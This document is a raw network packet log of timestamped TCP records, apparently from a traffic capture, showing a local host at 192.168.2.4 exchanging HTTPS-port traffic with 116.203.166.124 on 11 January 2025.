Jan 11, 2025 23:00:28.593564987 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593610048 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593631029 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593638897 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593652010 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593697071 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593719006 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.593776941 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.601727009 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.602225065 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602247000 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.602328062 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602355003 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.602387905 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602410078 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602462053 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602490902 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602503061 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.602518082 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.609447956 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.609484911 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.609507084 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.609539032 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.619802952 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.620007038 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620027065 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.620203018 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620223045 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.620256901 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620275021 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.620305061 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620325089 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.620338917 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620353937 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.620387077 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620405912 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620421886 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620448112 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620495081 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620515108 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620549917 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620568037 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620587111 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620677948 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620721102 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620748997 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620781898 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620820999 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620862007 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.620889902 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627351999 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.627543926 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627599955 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627631903 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.627650023 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627726078 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627751112 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.627782106 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627799988 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.627834082 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627851009 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.627885103 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.627955914 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.628002882 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.628024101 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.628057957 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.628079891 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.668721914 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.668787003 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.668914080 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.668961048 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.669061899 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.669096947 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.669157982 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.669178009 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.669264078 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.685338020 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.685412884 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.685550928 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.685595989 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.685689926 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.692837000 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.692956924 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.693021059 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.693136930 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.693169117 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.693206072 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.693330050 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.693371058 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.700457096 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.700474024 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.700579882 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.700618029 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.700711012 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.700738907 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.700835943 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.705049038 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.705068111 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.705177069 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.705200911 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.705296040 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.705326080 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.705677032 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.747350931 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.748912096 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.749061108 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.749138117 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.749161959 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.749499083 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.749536991 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.751667023 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.751693964 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.751724958 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.751766920 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.751789093 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.751827002 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.751851082 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.758379936 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.758443117 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.758697987 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.758708000 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.758747101 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.758882046 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.758932114 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.758969069 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.759123087 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.759203911 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.759228945 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.763544083 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.763710022 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.763928890 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.763964891 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.763992071 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.764117002 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.764167070 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.766020060 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.766103983 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.766582012 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.766618967 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.766750097 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.773047924 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.773109913 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.773381948 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.773421049 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.773438931 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.773627043 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.773686886 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.773704052 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775187016 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.775244951 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.775366068 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775396109 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.775433064 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775451899 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.775460958 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775481939 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775495052 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775506973 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.775568962 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775573969 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.775588036 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.775989056 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.781023026 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.781106949 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.781286955 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.781327963 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.781372070 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.781481981 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.781533957 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.784794092 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.784810066 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.784926891 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.784993887 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.785046101 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785058975 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.785099030 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785132885 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.785161972 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785193920 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785221100 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785240889 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785284996 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785299063 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.785309076 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.787296057 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.787425041 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.787561893 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.787596941 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.787617922 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.787632942 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.787714958 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.787750959 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.787800074 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.791063070 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.791234016 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.791385889 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.791424990 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.791436911 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.791449070 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.791436911 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.791574001 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.793565035 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.793725014 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.795818090 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.795841932 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.795994997 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.796082020 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.796120882 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.796211004 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.796231031 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.796278000 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.796302080 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.797146082 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.797229052 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.797473907 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.797502041 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.797656059 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.797676086 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.797696114 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.797741890 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.797772884 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.797802925 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.798016071 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.798069000 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.799335003 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.799393892 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.799510002 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.799571991 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.800548077 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.800566912 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.800667048 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.800703049 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.800793886 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.800817966 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.802905083 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.802923918 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.803045034 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803091049 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.803188086 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803215027 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.803248882 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803266048 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.803369045 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803409100 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803432941 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803448915 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.803486109 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.805193901 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.805269003 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.805397034 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.805428028 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.805501938 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.805521011 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.805597067 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.805648088 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.805716038 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.805747032 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.808182955 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.808303118 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.808444977 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.808489084 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.808511019 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.808536053 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.808598042 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.809741974 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.809922934 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.809956074 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.809982061 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.810014009 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.810822010 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.810986042 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.811130047 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811175108 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.811202049 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811223984 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811346054 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811372042 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811450005 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811484098 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.811552048 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.813436031 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.813496113 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.813625097 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.813657045 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.813671112 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.813857079 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.855334997 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.856965065 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.857096910 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857165098 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.857177973 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857439995 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.857501030 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857527018 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857542038 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.857547998 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857563019 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857563019 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857566118 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.857580900 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857635021 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857669115 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857697964 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.857726097 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.870198965 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.870249033 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.870500088 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.871337891 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.871357918 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.899353027 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905003071 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905111074 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.905174971 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905193090 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905330896 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.905400991 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905519009 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.905579090 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905776024 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905818939 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.905858040 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.905966997 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.906018972 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.906035900 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.906696081 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.906738043 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.906936884 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.906960964 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.907010078 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.907022953 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.947343111 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.949188948 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.949274063 CET	49777	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:28.949300051 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.949656963 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:28.997033119 CET	443	49777	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:29.536623001 CET	443	49778	116.203.166.124	192.168.2.4
Jan 11, 2025 23:00:29.536685944 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:29.537096024 CET	49778	443	192.168.2.4	116.203.166.124
Jan 11, 2025 23:00:29.537107944 CET	443	49778	116.203.166.124	192.168.2.4
